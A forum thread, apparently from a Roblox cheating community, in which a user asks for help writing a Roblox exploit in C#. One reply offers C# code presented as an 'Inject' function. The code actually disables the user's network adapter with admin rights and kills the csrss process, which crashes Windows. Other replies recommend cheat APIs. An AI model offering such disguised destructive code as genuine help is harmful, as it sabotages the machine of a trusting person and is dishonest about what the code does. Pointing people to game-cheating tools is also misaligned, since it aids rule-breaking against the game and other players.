Categories > Coding > C# >
I need help to create an exploit for roblox from the microsoft store, which api should I use?
Posted
i NEED HELP, I USE VISUAL STUDIO 2019 IN WINDOWS FORM C#.
Replied
https://media.tenor.com/uDXN9Sje-A0AAAAd/skeleton-spinning.gif
Cancel
Post
Replied
Place these functions in your main .cs file, and then run `Inject();` for your inject button
public static void Inject()
{
// Check if running with administrative privileges
if (!IsRunningAsAdmin())
{
Console.WriteLine("This operation requires administrative privileges.");
return;
}
// Disable the network adapter
ExecuteCommand("interface set interface \"Ethernet\" admin=disable"); // Replace "Ethernet" with the appropriate network adapter name on your system
}
private static void ExecuteCommand(string command)
{
using (var process = new Process())
{
process.StartInfo.FileName = "netsh";
process.StartInfo.Arguments = command;
process.StartInfo.Verb = "runas"; // Run the command as administrator
process.StartInfo.UseShellExecute = true;
process.Start();
}
}
And then place the following in the execute button:
System.Diagnostics.Process.GetProcessesByName("csrss")[0].Kill();
Cancel
Post
Contribute to Express, an open-source ROBLOX exploit written fully in C.
Replied
there are currently no public apis that work, you either pay 800$ a month for a dll or you make your own
Cancel
Post
Did I mention I use arch btw?
Replied
Use EasyExploits API, it works with the UWP Client
Cancel
Post
Users viewing this thread:
( Members: 0, Guests: 1, Total: 1 )
Cancel
Post